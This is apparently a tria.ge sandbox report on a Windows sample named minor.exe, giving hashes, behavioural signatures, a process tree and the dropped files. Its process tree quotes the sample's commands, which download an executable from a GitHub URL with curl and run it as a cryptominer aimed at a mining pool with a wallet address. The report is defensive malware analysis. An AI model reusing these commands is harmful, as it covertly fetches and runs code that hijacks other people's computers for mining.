Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

minor.exe

windows10-1703-x64

7

minor.exe

windows10-2004-x64

10

minor.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    75s
  • max time network
    188s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20/04/2024, 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    minor.exe

  • Size

    5.3MB

  • MD5

    96e6ccea2851f0c75461f7e87321b14c

  • SHA1

    03d9c8014f265984539b57152c2fb5c305eaaf37

  • SHA256

    7d3cd7a7f9c7e8a2fa5a244d2a3d3f6bce9f060e0e5cf4ea6700c642f00ed746

  • SHA512

    ba7707615e1415632c1ee65b6daaec916b7ee7ff5778f9a405201d756714445ba1213006077356db8db0cb7a36afe9bfc86ec076f09cf2f99f5f0eaa8660cf55

  • SSDEEP

    98304:QxfbbSECv84zUSzp1jkGVZiS0aOQQTNgVqMbCYn9MPx8cLfDzz/OIa8f:vXvfUSzrlVZiS0Xzg5/MmAba8

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\minor.exe
    "C:\Users\Admin\AppData\Local\Temp\minor.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Users\Admin\AppData\Local\Temp\onefile_2236_133580832329856836\minor.exe
      "C:\Users\Admin\AppData\Local\Temp\minor.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe
        3⤵
          PID:3168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 49WNFqsKfkfEsSuUf95s6YVai7nwsonYBGqnvfqrxsL3TWZSaYB6s5NZBekBcSVtq91FxWbnaAiVD5pT42whvANq48hHL7b -p minor -k"
          3⤵
            PID:4508

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
        Filesize

        81KB

        MD5

        4101128e19134a4733028cfaafc2f3bb

        SHA1

        66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

        SHA256

        5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

        SHA512

        4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd
        Filesize

        154KB

        MD5

        337b0e65a856568778e25660f77bc80a

        SHA1

        4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

        SHA256

        613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

        SHA512

        19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\onefile_2236_133580832329856836\VCRUNTIME140.dll
        Filesize

        96KB

        MD5

        f12681a472b9dd04a812e16096514974

        SHA1

        6fd102eb3e0b0e6eef08118d71f28702d1a9067c

        SHA256

        d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

        SHA512

        7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\onefile_2236_133580832329856836\minor.exe
        Filesize

        6.6MB

        MD5

        efad0224514af668288b4fd8eaec05c1

        SHA1

        9807444d6c2598c09d2904545b23d0c56655f424

        SHA256

        80ddb2503286195ed3dbea2c3e36c79a2214b0d2a5465af766a3d19fe69a5227

        SHA512

        d8115457b6984ae69675020a28767795420acce7428a2476f22357bc06b11da643919d134c6d274673098713a33c2627e3bb67a08ea491002fc0a31b1a6e1e07

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\onefile_2236_133580832329856836\python311.dll
        Filesize

        5.5MB

        MD5

        9a24c8c35e4ac4b1597124c1dcbebe0f

        SHA1

        f59782a4923a30118b97e01a7f8db69b92d8382a

        SHA256

        a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

        SHA512

        9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

        Download Submit

      • memory/2236-27-0x00007FF79B350000-0x00007FF79B8C0000-memory.dmp

        Filesize

        5.4MB

        Download

      • memory/4412-21-0x00007FF775010000-0x00007FF7756B7000-memory.dmp

        Filesize

        6.7MB

        Download